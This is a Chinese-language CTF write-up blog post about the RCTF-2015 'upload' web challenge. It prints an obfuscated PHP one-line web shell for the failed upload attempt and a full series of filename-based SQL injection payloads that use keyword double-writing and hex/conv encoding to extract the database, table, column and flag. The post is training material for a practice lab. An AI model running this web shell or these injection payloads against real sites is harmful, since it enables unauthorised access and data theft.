XCTF - web - wp1 (不定期整理)

最新推荐文章于 2022-09-01 12:05:05 发布
最新推荐文章于 2022-09-01 12:05:05 发布
阅读量664 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42444939/article/details/100569506
版权

  • upload ( RCTF - 2015 )

一进入靶场有个登陆注册(看上去像是二次注入,算辽先忍住骚操作,老老实实按部就班)
于是得到下面的上传文件界面:
在这里插入图片描述
结合题目upload,自然按照文件上传漏洞往下做
这里用我最常用的php一句话进行挂小马尝试:

<?= $fun = base64_decode($_REQUEST['fun']);
$arr = array($_POST['shell'] => '/.*/e',);
array_walk($arr, $fun, '');
?>

url : https://www.example.com?fun=cHJlZ19yZXBsYWNl
菜刀连接口令 : shell

保存为shell.php,尝试上传
发现提示Incorrect file extension!

所以用burp抓包尝试绕过:
在这里插入图片描述
先尝试看看00截断+修改content-type+大小写绕过能否成功
结果还是返回非法文件扩展名
坚持不懈一段时间以后,发现正常的png文件等也被过滤,只有jpg文件能通过认证
于是猜测是白名单认证机制
这时候我的大致思路是 挂图片马再去找解析漏洞,getshell
但是很可惜的是没有在靶场发现想要的解析漏洞,此路不通qaq(个人看来

可是有个很有意思的点是在上传完文件后会在原本的页面回显文件名
这时候回显本来很正常,但其他文件上传题一般这时候的回显会带上存储路径,本题则只显示shell.jpg,尝试直接以/shell.jpg访问,发现not found
在这里插入图片描述
而且在回到原页面前,有一段很快跳转走的(看似是上传过程)的页面,察觉到一丝蹊跷
(其实是因为记起…之前有同学和我提过这题不是文件上传题)
可以 这很CTF(不是)
再想想不仅原页面,而且中间很快跳转的那个页面,都有文件名的回显,所以想到了什么???
对!注入!!!(脸黑

那既然有了这个思路,就先fuzz一下(这里用的是自己写的关键词字典)
在这里插入图片描述
在这里插入图片描述
发现返回长度<=640的关键词都被过滤(长度为586的返回信息为sql injection found,也就意味着时间盲注和报错注入被ban)

但所幸的是其他很多关键词未被过滤,或是可以用简单的双写绕过(如select,and,from,union)

因为是上传文件操作,所以首先判断sql语句类型为insert
大致猜测如下:
insert into (unknownTableName) (unknownColName,…) values (‘filename.jpg’,…);

insert型注入最常见的思路是闭合前面的单引号,后用if/case等语句搭配sleep函数爆库爆表爆信息
但前面已经说过sleep函数被ban
这里就只能考虑在插入的数据里加入想要读取的敏感信息,再从回显里读出来
所以构造的payload格式大致如下
filename’+(xxx)+’.jpg
这样sql语句就变成了
insert into (unknownTableName) (unknownColName,…) values (‘filename’+(xxx)+’.jpg’,…);

原理基本捋清,接下来开始最简单的爆库名
payload: ‘+(seselectlect database())+’.jpg
在这里插入图片描述
在这里插入图片描述
发现页面返回0,但payload并没有被过滤,嗷那可能就是在回显上做了过滤
返回0考虑是不是页面限制只能回显数字类型
于是考虑借用hex + conv函数来将返回信息转为十进制
(这里稍微提一下mysql的hex函数,hex函数在输入参数为字符串时,会返回输入参数的十六进制表示形式,其中每个字符被转化为两个十六进制数字)
构造新的payload如下:
’+(conv(hex((seselectlect database())),16,10))+’.jpg
(注意所有的select语句想使用它的返回信息一定要记得加括号)
在这里插入图片描述
发现回显信息不为0了,但是是以科学计数法表示,说明回显限制长度
那就多加一个substr呗(这里以长度为10进行分割)
‘+(conv(hex(substr((seselectlect database()),1,5)),16,10))+’.jpg
在这里插入图片描述
在这里插入图片描述
接下来继续构造类似payload获取后面的库名信息
得到库名web_upload
然后就是常规操作啦
直接给payload

  • 爆表名:’+(conv(hex(substr((seselectlect group_concat(table_name) frfromom information_schema.tables where table_schema=‘web_upload’),1,5)),16,10))+’.jpg
    得到files,hello_flag_is_here
    肯定选择第二个表名啦
    继续!
  • 爆字段名:’+(conv(hex(substr((seselectlect group_concat(column_name) frfromom information_schema.columns where table_name=‘hello_flag_is_here’),1,5)),16,10))+’.jpg
    得到i_am_flag
    最后一步(液
  • 爆flag:’+(conv(hex(substr((seselectlect i_am_flag frfromom hello_flag_is_here),1,5)),16,10))+’.jpg
    拿到flag!!!

!!_@m_Th.e_F!lag

是道带坑的题…而且因为是filename注入,而且到回显的页面前还要两个中间界面跳转(携带cookie),所以暂时没想到怎么写脚本能简化注入步骤ojz
以后有时间再想想叭(或者有带佬在底下给我comment也行呀嘻嘻

|) |(7|3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xctf新手区(附详细过程)
qq_39670065的博客
09-15 2459
攻防世界
PHP命令执行
sca7tered的博客
10-02 871
PHP命令执行 主要函数 代码执行函数 ${} php复杂变量 <?php ${phpinfo()}; {KaTeX parse error: Expected 'EOF', got '}' at position 12: {getname()}}̲ => {s1ye} =>echo "s1ye";,可以发现先执行了getname函数并输出了“s1ye”,接着才执行了echo(优先级)。 $str = "{${phpinfo()}}",花括号定义了变量的边界,因此该条语句先执行括号中内容,
xctf web wp
qq_63267612的博客
02-11 2131
simple_php 最简单的php,根据题目,get a和b的值如果a和0比较返回为true,而且a为真而且b不是纯数字,而且b要大于1234满足这些条件则返回flag 所以在网页后面加上代码?a=0a&b=a4567得到flag disabled_button 题目是一个不能按的按钮,那把它变成能按的就行,下载下来然后用文本打开,删除disabled,然后再用浏览器打开就能按了,可以得到flag get_post 题目第一步就直接在网页后面赋值就行,然后题目要求请再以POST方式随便提交一个
XCTF_WP_新手向
Lee_7Z的博客
12-01 312
XCTF_WP_新手向 文章目录XCTF_WP_新手向REVERSE一、新手区二、进阶区——————————————————————MISC一、新手区二、进阶区总结 提示:以下是本篇文章正文内容,下面WP可供参考 REVERSE 一、新手区 insanity 拖进IDA,发现main函数没啥用,shift+F12看到 猜测9447{This is a flag}为flag,提交通过 二、进阶区 —————————————————————— MISC 一、新手区 this_is_flag
xctf攻防世界 Web高手进阶区 comment
l8947943的博客
01-06 3308
1. 进入环境,查看内容 跳转到login.php 入手点是想办法登录后,再进行操作。 接下来一顿扫描瞅瞅: 2. 问题分析 想办法先登入进去 我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图: 添加payloads,如图: Start attack!慢慢等吧,巨慢,如图: 发现当***为666时候请求302了,emmm,走起,如图: 利用.git获取源码 想到前面dirsearch出来的内容,根
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
xctf-upload1
x1871329637的博客
09-01 780
只能上传图片,写一句话木马,通过burp抓包修改后缀上传。将shell.jpg后缀改为php同时也拿到了目录。修改后缀为jpg抓包上传。
信息安全类-XCTF_OJ练习平台
山里樵夫俗称大叔
10-25 9376
资源网站名称:XCTF_OJ练习平台 网址:http://oj.xctf.org.cn/ 简介: XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络安全技术对抗赛练习平台。 XCTF-OJ平台将汇集国内外CTF网络安全竞赛的真题题库,并支持对部分可获取在线题目交互环境的重现恢复,XCTF联赛后续
XCTF 新手 RE maze
A_dmin的博客
07-03 1505
XCTF 新手 RE maze 一天一道CTF题目,能多不能少 今天没有心思复习,于是打开XCTF想找个题目做一下,结果发现这道题目有50多天没解决,,, 想看看到底是什么题目,这么久没写,啊哈哈哈 由题目得知这个题可能是迷宫,,,,, 下载文件,用ida打开(64位) 找到主函数~,太长了不好截图,就把源码贴出来吧,源码如下: __int64 __fastcall main(__int64 a...
xctf刷题随笔
qq_52974719的博客
07-26 260
XCTF-RE-hackme and BABYREhackmeBABYREdebug hackme 1、查壳 64位elf文件,拖入IDA中打开 2、IDA分析 函数窗口发现全是sub_开头,没有解析出函数名。 试着shift+f12查看字符串 发现give me the password字符串,根据调用,跟进函数。 分析函数逻辑,得出v7是我们的输入,即flag并且长度为22位,设定v6等于10,进行do while循环,可知主要操作是v15和v11异或后与同下标的v12进行比较,而v15的生成算法与v1
xctf攻防世界 MISC高手进阶区 很普通的数独
l8947943的博客
01-16 6725
1. 进入环境,下载附件 给的一个压缩包,里面一堆图片 一共25张,没啥其他的提示信息 2. 问题分析 猜测为二维码 为什么猜测是二维码? 图片个数是25 = 5 * 5的大小 数字存在的意义不是为了让你计算,应该表示占位符 图一有二维码定位图 是不是很像!题目分析很容易,方向其实也蛮明显的,但是用最笨的方法,就是1-25图一个个数数字,最终整理,得到45张二进制: 111111101010101000101000001111110000101111111 100000101100111101
xctf_web upload1
fly夏天的博客
09-30 1962
题目一打开就只有上传界面 习惯性的后台扫描一下没有可以页面,看来目标就在这个上传功能上面了。 尝试上传php文件,报错。 这里我尝试传了一个图片马,能成功上传但是菜刀无法执行。 f12检查源码,发现前端有一个js验证,有一个白名单过滤,只允许上传png或jpg文件。 这里我们可以直接前端删除这段js函数。 然后选择上传一个php文件,刷新即可成功上传。 网站直接给出了上传地址...
攻防世界 web进阶—upload
weixin_42499640的博客
07-18 1442
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
XCTF:unfinish(2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1017
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值